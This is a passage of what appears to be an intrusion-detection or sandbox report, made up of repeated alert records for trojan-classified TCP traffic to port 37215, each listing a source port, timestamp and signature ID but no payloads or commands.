                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.037758
                  SID:2829579
                  Source Port:48166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.464906
                  SID:2829579
                  Source Port:37658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.189669
                  SID:2835222
                  Source Port:56644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.597070
                  SID:2835222
                  Source Port:50214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.601191
                  SID:2835222
                  Source Port:55922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.640337
                  SID:2829579
                  Source Port:36340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.833755
                  SID:2829579
                  Source Port:46264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.538160
                  SID:2835222
                  Source Port:34238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.919552
                  SID:2835222
                  Source Port:38124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.984477
                  SID:2835222
                  Source Port:56114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.021968
                  SID:2829579
                  Source Port:52388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.610396
                  SID:2835222
                  Source Port:39068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.428131
                  SID:2829579
                  Source Port:56414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.372351
                  SID:2835222
                  Source Port:45976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.792966
                  SID:2829579
                  Source Port:43592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.854070
                  SID:2829579
                  Source Port:50238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.598272
                  SID:2829579
                  Source Port:48316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.593118
                  SID:2829579
                  Source Port:54546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.574442
                  SID:2835222
                  Source Port:47418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.896856
                  SID:2829579
                  Source Port:48056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.847925
                  SID:2829579
                  Source Port:44284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.352248
                  SID:2835222
                  Source Port:60324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.829086
                  SID:2829579
                  Source Port:46592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.882743
                  SID:2835222
                  Source Port:52366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.964382
                  SID:2835222
                  Source Port:50628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.390670
                  SID:2835222
                  Source Port:48330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.912593
                  SID:2829579
                  Source Port:36480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.328936
                  SID:2829579
                  Source Port:57486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.858032
                  SID:2829579
                  Source Port:49166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.862612
                  SID:2829579
                  Source Port:35210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.690797
                  SID:2829579
                  Source Port:58260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.746967
                  SID:2835222
                  Source Port:37472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.906532
                  SID:2835222
                  Source Port:57384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.592658
                  SID:2835222
                  Source Port:54138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.429054
                  SID:2829579
                  Source Port:39244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.912648
                  SID:2829579
                  Source Port:34218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.540694
                  SID:2829579
                  Source Port:46488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.412870
                  SID:2829579
                  Source Port:52266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.823553
                  SID:2829579
                  Source Port:58866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.826871
                  SID:2835222
                  Source Port:42204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.775037
                  SID:2829579
                  Source Port:53988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121645
                  SID:2829579
                  Source Port:53822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.903191
                  SID:2835222
                  Source Port:41562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.158700
                  SID:2835222
                  Source Port:54206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.155522
                  SID:2835222
                  Source Port:40824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.939939
                  SID:2829579
                  Source Port:37798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.360027
                  SID:2829579
                  Source Port:36252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.050359
                  SID:2835222
                  Source Port:45734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.268885
                  SID:2835222
                  Source Port:46682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.087828
                  SID:2829579
                  Source Port:56084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.090625
                  SID:2829579
                  Source Port:54810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.573653
                  SID:2829579
                  Source Port:58622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.516215
                  SID:2835222
                  Source Port:59356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.249351
                  SID:2829579
                  Source Port:38318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.728066
                  SID:2829579
                  Source Port:32904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.526473
                  SID:2835222
                  Source Port:35158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.453376
                  SID:2835222
                  Source Port:54160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.684788
                  SID:2835222
                  Source Port:58174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.516859
                  SID:2829579
                  Source Port:50264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.420167
                  SID:2829579
                  Source Port:54972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.462014
                  SID:2829579
                  Source Port:47288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:29.335030
                  SID:2835222
                  Source Port:55046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.028864
                  SID:2835222
                  Source Port:45448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.525834
                  SID:2829579
                  Source Port:47128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.992846
                  SID:2829579
                  Source Port:49932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.714524
                  SID:2835222
                  Source Port:50082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.513310
                  SID:2835222
                  Source Port:37870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.268885
                  SID:2835222
                  Source Port:34786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.620930
                  SID:2835222
                  Source Port:46684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.477635
                  SID:2829579
                  Source Port:58380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.741925
                  SID:2835222
                  Source Port:59732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.858486
                  SID:2835222
                  Source Port:38286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.538879
                  SID:2835222
                  Source Port:60248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.809769
                  SID:2829579
                  Source Port:39358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.524455
                  SID:2829579
                  Source Port:38218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.456007
                  SID:2829579
                  Source Port:55314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.904429
                  SID:2835222
                  Source Port:53388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.148356
                  SID:2835222
                  Source Port:55970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.047085
                  SID:2829579
                  Source Port:33438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.540139
                  SID:2835222
                  Source Port:59342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.303785
                  SID:2835222
                  Source Port:34116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.286064
                  SID:2829579
                  Source Port:36392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.870482
                  SID:2835222
                  Source Port:55522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.172678
                  SID:2835222
                  Source Port:59888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.200421
                  SID:2829579
                  Source Port:58764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.854683
                  SID:2835222
                  Source Port:42480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.300149
                  SID:2835222
                  Source Port:52928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.165242
                  SID:2829579
                  Source Port:45356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.920838
                  SID:2829579
                  Source Port:57644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.359612
                  SID:2835222
                  Source Port:35844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.834024
                  SID:2835222
                  Source Port:56828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.470125
                  SID:2835222
                  Source Port:58892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369689
                  SID:2829579
                  Source Port:41552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.927826
                  SID:2835222
                  Source Port:36384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.112461
                  SID:2835222
                  Source Port:38350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.011354
                  SID:2835222
                  Source Port:60442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.254680
                  SID:2829579
                  Source Port:52940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.489604
                  SID:2835222
                  Source Port:43302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.108378
                  SID:2829579
                  Source Port:55060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.684476
                  SID:2835222
                  Source Port:51304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.530342
                  SID:2829579
                  Source Port:49786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.150804
                  SID:2835222
                  Source Port:51462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.505039
                  SID:2835222
                  Source Port:59930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.853169
                  SID:2829579
                  Source Port:46628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.475374
                  SID:2835222
                  Source Port:46918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.847227
                  SID:2835222
                  Source Port:58428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.906271
                  SID:2829579
                  Source Port:60488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819021
                  SID:2829579
                  Source Port:58622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.563239
                  SID:2835222
                  Source Port:46116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.101727
                  SID:2829579
                  Source Port:46274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.876931
                  SID:2829579
                  Source Port:36794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.929759
                  SID:2835222
                  Source Port:32808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.526519
                  SID:2835222
                  Source Port:38296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.188793
                  SID:2835222
                  Source Port:41464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.865429
                  SID:2835222
                  Source Port:57836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.980953
                  SID:2829579
                  Source Port:33270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.707138
                  SID:2829579
                  Source Port:45292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.077198
                  SID:2835222
                  Source Port:54504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.758809
                  SID:2829579
                  Source Port:46662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.898408
                  SID:2829579
                  Source Port:52508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.360429
                  SID:2835222
                  Source Port:42358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.164918
                  SID:2829579
                  Source Port:58612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.088792
                  SID:2829579
                  Source Port:40724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.333013
                  SID:2829579
                  Source Port:45034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.130585
                  SID:2835222
                  Source Port:54424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.464589
                  SID:2829579
                  Source Port:58934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.122842
                  SID:2835222
                  Source Port:33962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.620952
                  SID:2835222
                  Source Port:34516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.257964
                  SID:2829579
                  Source Port:55770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.645798
                  SID:2829579
                  Source Port:46724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.958121
                  SID:2829579
                  Source Port:36598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.418573
                  SID:2835222
                  Source Port:50818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.397639
                  SID:2835222
                  Source Port:50246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.487738
                  SID:2835222
                  Source Port:45102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.753086
                  SID:2829579
                  Source Port:39440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.168477
                  SID:2829579
                  Source Port:48626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.347841
                  SID:2829579
                  Source Port:33732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.437797
                  SID:2829579
                  Source Port:37618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.489140
                  SID:2829579
                  Source Port:39462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.102674
                  SID:2829579
                  Source Port:39652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.400738
                  SID:2835222
                  Source Port:35768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.903843
                  SID:2829579
                  Source Port:45722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.112829
                  SID:2835222
                  Source Port:52450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.596946
                  SID:2829579
                  Source Port:51612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.796781
                  SID:2835222
                  Source Port:38190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.550215
                  SID:2835222
                  Source Port:57462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.317114
                  SID:2829579
                  Source Port:58024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.558998
                  SID:2835222
                  Source Port:38264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.821091
                  SID:2829579
                  Source Port:60324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.891861
                  SID:2835222
                  Source Port:50318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.566998
                  SID:2829579
                  Source Port:47464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.157355
                  SID:2835222
                  Source Port:36626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.675558
                  SID:2835222
                  Source Port:35928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.512743
                  SID:2835222
                  Source Port:43230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.178125
                  SID:2835222
                  Source Port:33596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.593269
                  SID:2829579
                  Source Port:42990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.086105
                  SID:2835222
                  Source Port:38458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.164158
                  SID:2829579
                  Source Port:55166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.781993
                  SID:2835222
                  Source Port:50116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.957174
                  SID:2829579
                  Source Port:53054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.412614
                  SID:2835222
                  Source Port:50710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778157
                  SID:2835222
                  Source Port:51620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.197956
                  SID:2829579
                  Source Port:44640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.878824
                  SID:2829579
                  Source Port:57396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.933243
                  SID:2835222
                  Source Port:47296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.521553
                  SID:2829579
                  Source Port:39018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.562174
                  SID:2829579
                  Source Port:47108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.880415
                  SID:2829579
                  Source Port:38984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.117247
                  SID:2835222
                  Source Port:51596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.568702
                  SID:2829579
                  Source Port:59946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.386325
                  SID:2835222
                  Source Port:32772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558615
                  SID:2829579
                  Source Port:35690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376738
                  SID:2829579
                  Source Port:46732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.631590
                  SID:2829579
                  Source Port:42722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.600336
                  SID:2829579
                  Source Port:34110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.847228
                  SID:2835222
                  Source Port:35076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.251231
                  SID:2829579
                  Source Port:46840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.171305
                  SID:2835222
                  Source Port:38462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.350538
                  SID:2829579
                  Source Port:51716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.788071
                  SID:2829579
                  Source Port:52324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.834773
                  SID:2829579
                  Source Port:42298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.803828
                  SID:2829579
                  Source Port:53526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.385644
                  SID:2829579
